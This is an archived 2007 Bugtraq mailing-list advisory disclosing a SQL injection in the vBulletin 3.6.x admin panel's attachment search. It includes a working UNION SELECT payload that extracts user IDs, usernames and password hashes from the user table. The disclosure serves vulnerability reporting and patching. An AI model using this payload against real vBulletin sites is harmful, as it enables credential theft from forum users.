vbulletin admincp sql injection

To: bugtraq@xxxxxxxxxxxxxxxxx, full-disclosure@xxxxxxxxxxxxxxxxx
Subject: vbulletin admincp sql injection
From: disfigure <disfigure@xxxxxxxxx>
Date: Tue, 13 Mar 2007 12:41:59 -0500
Dkim-signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=K29wxyAI+CvEtQOSZqSCqKHG5SnGtQb0fh+nevcfjRsh89MX83yC9OVF5ElevZOuhkcsjExSeAiouvqWpAWrbbRCf3Gviv5tzwQiTbYSOuyEqaLan5JV+PUzx5nrvBghCS+tzVLwmnHKzXf3S88oy+qt689DlI4ffaO9KwjULz4=
Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=M6D2PzYogmECDy2j4lTu7oVsrgoM1CA8fkzphwsvZ2wXKh0w7Ev8N7grLOdB9ACVT5Z4zci33o+QWI6IgCA1EYfiBtTQegOsUKuIyOh7i27E2BcZ6ZsgqKm3o0VcWpsqeqrZWwMAp7hGxvGQnBhPm+Wjdqs9mDa/s5iGoqQRE8Q=
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

/****************************************/

CREDIT:
discovered by meto5757 and disfigure

PRODUCT:
vBulletin
http://www.vbulletin.com/

VULNERABILITY:
SQL Injection

NOTES:
- not a serious vulnerability, can only be used by administrator of site
- SQL injection can be used to obtain password hash
- tested on 3.6.4 and 3.6.5

POC:
1. Log in to admin panel
2. Go to Attachments->Search
3. Place the following string in the Attached Before field:

') union select 1,1,1,1,1,userid,password,1,username from user -- 9

greets: w4ck1ng.com

/****************************************/

Prev by Date: Re: Firekeeper - IDS for Firefox available
Next by Date: WebCalendar v0.9.45 (13 Dec 2004) (login.php) Remote File include
Previous by thread: LIBFtp 5.0 (sprintf(), strcpy()) Multiple local buffer overflow
Next by thread: Re: vbulletin admincp sql injection
Index(es):
- Date
- Thread